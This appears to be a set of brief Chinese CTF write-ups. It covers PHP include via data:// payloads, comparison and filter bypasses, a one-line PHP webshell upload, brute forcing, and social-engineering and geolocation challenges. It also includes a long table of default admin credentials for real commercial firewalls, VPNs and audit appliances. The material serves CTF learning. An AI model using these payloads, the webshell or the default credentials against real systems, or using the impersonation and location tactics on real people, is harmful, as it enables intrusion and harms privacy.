1.攻防世界 web php include
page会先通过strstr(A,B)函数 [在A中查找是否有B] 检查其中是否有"php://",如果有则会通过str_replace(A,B,C)函数 [将C中所有A替换为B] 将"php://"删去。
所以基本上就不可能用php://伪协议
但可以尝试data://text/plain
我们如果要知道flag在哪里,首先得知道有哪些文件
而要知道有哪些文件,又得先知道文件的根目录
这时候可以使用输出$_SERVER[‘DOCUMENT_ROOT’]的方式来探知所在目录
配合data://text/plain使用,构造?page=data://text/plain,<?php echo $_SERVER['DOCUMENT_ROOT'];?>
结果如下图:
scandir() 函数返回指定目录中的文件和目录的数组。构造<?php print_r(scandir("/var/www"));?>
我们的目标就是要fl4gisisish3r3.php
我们接着构造<?php show_source("fl4gisisish3r3.php");?>来查看文件
2.bugku 各种绕过
审计代码,我们得知我们的uname和passwd的值相等,使用数组绕过,第二个弱比较传参让id=margin,即可得到flag
3.bugku社工 伪造
看来这女的没那么好骗出flag,其他人都是点不了的,我进去空间看看
看来她男朋友叫小bug,去QQ看看,发现真的有这个人
?我把自己的qq改成和那个人一样,把头像和昵称修改,得到flag
flag{8a889f64c14934f754d1bf970f730958}
4.梦极光 变量覆盖
由于网站被关闭了,我们使用了网上的照片
?读代码,我们要在cookie上使key=guetctf,然后post data,var=I want flag,但是flag会被替换为空,于是我想了个办法,构造flflagag,这样就能在hackbar上成功传参,得到flag。
5.ctf hub文件上传无限制
他让我们上传一个文件,由于没有限制,我们直接上传个一句话木马<?php eval($_POST['password']);?> ?? 上传成功后使用蚁剑进行连接,
得到flag
6.bugku 大雁塔
?
?从文中信息,我们可以得知此人离始发站有800米,离始发站下一站1km,且该地铁站中间还要转站,打开地图
?根据我们得到的信息,距离大雁塔站7站的始发站有两个,分别是2号线的韦曲南和3号线的鱼化寨。但是它在地铁过程中要进行中转,所以我们可以锁定它是从韦曲南站出发的。
我们打开韦曲南站地图,根据800米和1000米的线索,得到城南名园,兰乔国际城,翰怡苑,东新花园,长安长运花园,长安老干局小区
最后一个个尝试,得到兰乔国际城为flag
7.ctfhub 默认口令
打开场景,
一般来说用户名为admin,但是密码我们不知道,一般来说不更改的情况下会有默认密码,就像学校的校园网一样,和宽带密码的123456那样,所以我们搜索该公司邮件网关的默认密码,得到flag
一些之前的
设备???? 默认账号????? 默认密码
深信服产品??? sangfor??? sangfor
sangfor@2018
sangfor@2019
深信服科技 AD??????? dlanrecover
深信服负载均衡 AD 3.6??? admin??? admin
深信服WAC ( WNS V2.6)??? admin??? admin
深信服VPN??? Admin??? Admin
深信服ipsec-VPN (SSL 5.5)??? Admin??? Admin
深信服AC6.0??? admin??? admin
SANGFOR防火墙??? admin??? sangfor
深信服AF(NGAF V2.2)??? admin??? sangfor
深信服NGAF下一代应用防火墙(NGAF V4.3)??? admin??? admin
深信服AD3.9??? admin??? admin
深信服上网行为管理设备数据中心??? Admin??? 密码为空
SANGFOR_AD_v5.1??? admin??? admin
网御漏洞扫描系统??? leadsec??? leadsec
天阗入侵检测与管理系统 V7.0?? ?
Admin??? venus70
Audit??? venus70
adm??? venus70
天阗入侵检测与管理系统 V6.0?? ?
Admin??? venus60
Audit??? venus60
adm??? venus60
网御WAF集中控制中心(V3.0R5.0)?? ?
admin??? leadsec.waf
audit??? leadsec.waf
adm??? leadsec.waf
联想网御??? administrator??? administrator
网御事件服务器??? admin??? admin123
联想网御防火墙PowerV??? administrator??? administrator
联想网御入侵检测系统??? lenovo??? default
网络卫士入侵检测系统??? admin??? talent
网御入侵检测系统V3.2.72.0?? ?
adm??? leadsec32
admin??? leadsec32
联想网御入侵检测系统IDS?? ?
root??? 111111
admin??? admin123
科来网络回溯分析系统??? csadmin??? colasoft
中控考勤机web3.0??? administrator??? 123456
H3C iMC??? admin??? admin
H3C SecPath系列??? admin??? admin
H3C S5120-SI??? test??? 123
H3C智能管理中心?? ?
admin??? admin
H3C ER3100??? admin??? adminer3100
H3C ER3200??? admin??? adminer3200
H3C ER3260??? admin??? adminer3260
H3C??? admin??? adminer
admin??? admin
admin??? h3capadmin
h3c??? h3c
360天擎??? admin??? admin
网神防火墙??? firewall??? firewall
天融信防火墙NGFW4000??? superman??? talent
黑盾防火墙??? admin??? admin
rule??? abc123
audit??? abc123
华为防火墙??? telnetuser??? telnetpwd
ftpuser??? ftppwd
方正防火墙??? admin??? admin
飞塔防火墙??? admin??? 密码为空
Juniper_SSG__5防火墙??? netscreen??? netscreen
中新金盾硬件防火墙??? admin??? 123
kill防火墙(冠群金辰)??? admin??? sys123
天清汉马USG防火墙?? ?
admin??? venus.fw
Audit??? venus.audit
useradmin??? venus.user
阿姆瑞特防火墙??? admin??? manager
山石网科??? hillstone??? hillstone
绿盟安全审计系统?? ?
weboper??? weboper
webaudit??? webaudit
conadmin??? conadmin
admin??? admin
shell??? shell
绿盟产品??????? nsfocus123
TopAudit日志审计系统??? superman??? talent
LogBase日志管理综合审计系统??? admin??? safetybase
网神SecFox运维安全管理与审计系统??? admin??? !1fw@2soc#3vpn
天融信数据库审计系统??? superman??? telent
Hillstone安全审计平台??? hillstone??? hillstone
网康日志中心??? ns25000??? ns25000
网络安全审计系统(中科新业)??? admin??? 123456
天玥网络安全审计系统??? Admin??? cyberaudit
明御WEB应用防火墙??? admin??? admin
admin??? adminadmin
明御攻防实验室平台??? root??? 123456
明御安全网关??? admin??? adminadmin
明御运维审计与册风险控制系统?? ?
admin??? 1q2w3e
system??? 1q2w3e4r
auditor??? 1q2w3e4r
operator??? 1q2w3e4r
明御网站卫士?? ?
sysmanager??? sysmanager888
亿邮邮件网关?? ?
eyouuser??? eyou_admin
eyougw??? admin@(eyou)
admin??? +-ccccc
admin??? cyouadmin
Websense邮件安全网关??? administrator??? admin
梭子鱼邮件存储网关??? admin??? admin
8.梦激光 异或运算
找到在线异或运算机器,输入guetctf,加密后传参code=异或运算,得到flag
url应该也可以
guetctf,使用
9.实战社工
广东省
白云区
10.bugku 好像需要密码
启动场景,根据提示,是一个五位数的密码,我们抓包进行爆破,打开burpsuite,然后发到intruder,爆破了贼久才出来密码12468
